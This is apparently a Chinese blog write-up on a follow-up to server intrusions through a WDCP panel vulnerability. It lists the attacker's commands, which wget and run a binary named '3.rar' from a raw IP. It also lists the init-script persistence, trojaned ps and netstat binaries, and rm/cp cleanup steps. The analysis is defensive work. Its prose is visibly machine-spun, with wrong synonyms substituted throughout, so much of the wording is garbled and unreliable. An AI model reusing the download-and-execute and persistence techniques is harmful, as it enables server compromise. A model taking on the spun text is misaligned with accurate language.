接上篇:一个面板激发的血案(http://www.server110.com/linux_sec/201410/10926.html
接洽到我的几位客户都是沟通的环境,沟通的日期(10月27日)由沟通的IP(117.42.52.36,扫了下,可以确定这个IP不是处事器主机,至于是黑 客本身的电脑照旧肉鸡就不得而知了)操作wdcp裂痕入侵。
从日志来看,入侵是由东西自动化完成的。
黑 客入侵后留下的呼吁记录如下:
cd /root
wget http://60.172.229.178/3.rar
chmod 0755 /root/3.rar
chmod 0755 ./3.rar
/dev/null 2>&1 &
nohup ./3.rar > /dev/null 2>&1 &
(3.rar MD5为:522a3b05908c40e37c08e8fb14171dfc)
下面主要写一下3.rar(留意这是个二进制措施,而非压缩包)执行后修悔改的文件,给各人修复提供参考。
建设文件:
/etc/rc.d/init.d/DbSecuritySdt
/etc/rc.d/rc1.d/S97DbSecuritySdt
/etc/rc.d/rc2.d/S97DbSecuritySdt
/etc/rc.d/rc3.d/S97DbSecuritySdt
/etc/rc.d/rc4.d/S97DbSecuritySdt
/etc/rc.d/rc5.d/S97DbSecuritySdt
上面的文件内容都一样,内容为:
#!/bin/bash
/root/3.rar
目标是让3.rar重启后自动运行。
建设文件:
/usr/bin/bsd-port/getty
文件内容和3.rar沟通。
同目次下尚有conf.n和getty.lock。
建设文件:
/usr/bin/acpid
文件内容和3.rar沟通。
建设文件:
/etc/rc.d/init.d/selinux
/etc/rc.d/rc1.d/S99selinux
/etc/rc.d/rc2.d/S99selinux
/etc/rc.d/rc3.d/S99selinux
/etc/rc.d/rc4.d/S99selinux
/etc/rc.d/rc5.d/S99selinux
文件内容如下:
#!/bin/bash
/usr/bin/bsd-port/getty
目标照旧让恶意措施在系统重启后自动动作。
建设目次:
/usr/bin/dpkgd/
目次下有二个措施:
netstat ps
这个是系统中正常的措施,转移到这里做了备份。
替换掉了系统中的/bin/ps和/bin/netstat。
替换后的措施在执行后可以埋没掉恶意措施的相关执行信息,而且插手了复生恶意措施的成果。
文件操纵到此竣事。
假如确定和本文描写的入侵环境完全沟通,可以用下面的呼吁修复:
killall 3.rar getty acpid
rm -f /etc/rc.d/rc*.d/S97DbSecuritySdt
rm -f /etc/rc.d/init.d/DbSecuritySdt
rm -rf /usr/bin/bsd-port/
rm -f /usr/bin/acpid
rm -f /etc/init.d/selinux
rm -f /etc/rc.d/rc*.d/S99selinux
rm -f /bin/ps /bin/netstat
cp /usr/bin/dpkgd/ps /bin/
cp /usr/bin/dpkgd/netstat /bin/
这次的WDCP裂痕中,这个3.rar做的恶较量多,但它并不是独一的做恶者(其他的人可能措施会留下其他的对象,不在上面的描写范畴内)。
最早的入侵陈迹在10月初已经呈现,3.rar呈现的较量晚,,可是呈现的多,并且外貌上造成的影响较量大(对外扫描必定会导致呆板被封,在海外某些主机商甚至会BAN帐号)。
全文完。
WDCP裂痕入侵后续整理
